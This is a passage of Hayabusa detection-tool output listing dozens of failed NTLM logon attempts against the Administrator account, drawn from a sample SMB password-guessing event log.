| 1496 | 2016-09-20 01:50:44.184 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: xg9rUUIwEfujwCvq : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1497 | 2016-09-20 01:50:44.232 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: zfvpeyTKc3YYkVkw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1498 | 2016-09-20 01:50:44.302 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: VJGR6CYKLUJp2fWl : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1499 | 2016-09-20 01:50:44.361 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: cmSap0AJZq0KMRBV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1500 | 2016-09-20 01:50:44.429 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: XnVCbq1IYZF19oYR : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1501 | 2016-09-20 01:50:44.485 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: aVaDMa2uNXTZNcBj : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1502 | 2016-09-20 01:50:44.538 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ymf6Fhv5ieWwcq73 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1503 | 2016-09-20 01:50:44.584 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: CT6YMlX1GqeEuAHl : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1504 | 2016-09-20 01:50:44.625 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: FDJ1IFpMNQ2Euhyn : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1505 | 2016-09-20 01:50:44.672 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: EGTzqnHJIiZdSgNk : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1506 | 2016-09-20 01:50:44.732 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: epSckAKbAp8qag89 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1507 | 2016-09-20 01:50:44.788 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: NNC8ilAuznKPwFvV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1508 | 2016-09-20 01:50:44.834 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: wObt647cIBPiVaZi : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1509 | 2016-09-20 01:50:44.873 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: nYDe1L7NNxDGQ0Vt : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1510 | 2016-09-20 01:50:44.927 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: mXroClxv7B0aCTYv : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1511 | 2016-09-20 01:50:44.973 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: kCVah2QOH1hMSV76 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1512 | 2016-09-20 01:50:45.020 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 2HjD65Xy4Hppim2l : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1513 | 2016-09-20 01:50:45.065 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: xwmEQxC4iTcF4aFu : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1514 | 2016-09-20 01:50:45.114 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: q3QxOH7ok8RR068t : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1515 | 2016-09-20 01:50:45.164 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: dJFj6Ckw1HdK9w52 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1516 | 2016-09-20 01:50:45.209 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Qqu3Im4HXQNyGnYm : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1517 | 2016-09-20 01:50:45.248 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: bk5dmjQDnpSlREum : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1518 | 2016-09-20 01:50:45.279 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Pk4BvYgXBR2whf80 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1519 | 2016-09-20 01:50:45.327 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: i6n1su2TUr7ONQr4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1520 | 2016-09-20 01:50:45.368 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: givsEAGfG0smN9Re : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1521 | 2016-09-20 01:50:45.418 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: i2YuM0i7a2QuY7xb : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1522 | 2016-09-20 01:50:45.470 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: xuocQPZpd91adY0E : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1523 | 2016-09-20 01:50:45.541 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: PvGB1dZrfDWyZoqs : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1524 | 2016-09-20 01:50:45.588 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: w4oi8iL88rJo7g2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1525 | 2016-09-20 01:50:45.676 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: cF3OUnytXi4NjvqB : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1526 | 2016-09-20 01:50:45.725 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: WKkJcp3TYj31iJUM : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1527 | 2016-09-20 01:50:45.760 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: G0E44RVqAE1feU0b : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1528 | 2016-09-20 01:50:45.796 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Ny5LCb1qOIUhxOPY : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1529 | 2016-09-20 01:50:45.840 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 9jcDgzzqH26DjQ1k : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1530 | 2016-09-20 01:50:45.885 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: yil94cFkU6UP24SK : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1531 | 2016-09-20 01:50:45.927 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: bkdVHF3vggCcuNdn : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1532 | 2016-09-20 01:50:45.964 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 4dRRI2CS3aVIX4nX : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1533 | 2016-09-20 01:50:46.004 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: chDZq3VgxIE2mRb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1534 | 2016-09-20 01:50:46.046 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: HLVvgMmqLXKZADON : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1535 | 2016-09-20 01:50:46.080 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: i4avO2AJSlNb0IUL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1536 | 2016-09-20 01:50:46.128 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Mdo5CvycGvGhn33y : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1537 | 2016-09-20 01:50:46.171 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: heJfjLl1vbX6lMjZ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1538 | 2016-09-20 01:50:46.209 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: wOP1E6hd4Jtj4gob : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1539 | 2016-09-20 01:50:46.248 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Xa7kMCNz0bEGTBqX : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1540 | 2016-09-20 01:50:46.293 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: HSxTQ4HsZt2DeYVe : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1541 | 2016-09-20 01:50:46.341 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: YxHpSQwFSV4hveVM : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1542 | 2016-09-20 01:50:46.372 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: n3OwzSPomxZLoCe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1543 | 2016-09-20 01:50:46.416 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: e9IfwDZIfYT6A50K : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1544 | 2016-09-20 01:50:46.463 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: JOf6DbRX4zlNqLdb : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1545 | 2016-09-20 01:50:46.508 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 00kXrnJNH40NyoYL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1546 | 2016-09-20 01:50:46.549 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: nsNHcb9pnpdRgeL7 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1547 | 2016-09-20 01:50:46.592 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ucMhgxMXy9Ch1jNm : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1548 | 2016-09-20 01:50:46.637 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Cfi3ZaLTECJgjM9x : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1549 | 2016-09-20 01:50:46.680 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: usugjEEBHlhJvOyu : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1550 | 2016-09-20 01:50:46.720 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: WQ1pM2CVLt5ITVD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1551 | 2016-09-20 01:50:46.746 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: NIboW7hNljF3HPpk : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1552 | 2016-09-20 01:50:46.795 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: rOk5W4rkSYRRw4xS : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1553 | 2016-09-20 01:50:46.858 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: AJTfcwd8rnFc06iF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1554 | 2016-09-20 01:50:46.930 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 6sm415W5zkvjdnTV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1555 | 2016-09-20 01:50:46.981 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: KEiSbtlmW4ou1mc7 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1556 | 2016-09-20 01:50:47.012 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: xWeZV5pHt94adwUy : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1557 | 2016-09-20 01:50:47.052 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5np7HeCPAFTDdTXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1558 | 2016-09-20 01:50:47.088 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: gXbe2jEJVtwaQXlr : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1559 | 2016-09-20 01:50:47.134 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 7hZFiUCJnaBdHcw4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1560 | 2016-09-20 01:50:47.176 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: a71wyo41KV1ZoT7p : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1561 | 2016-09-20 01:50:47.236 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ogB17WdeOiC19rqn : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1562 | 2016-09-20 01:50:47.286 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ANOLPWG12lkW39Ei : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1563 | 2016-09-20 01:50:47.332 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Y1vf7OUxb6TH3Q4H : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1564 | 2016-09-20 01:50:47.368 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: bxU5yumSieUzSgzH : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1565 | 2016-09-20 01:50:47.401 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: v9K5EoWWASU8SlSe : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
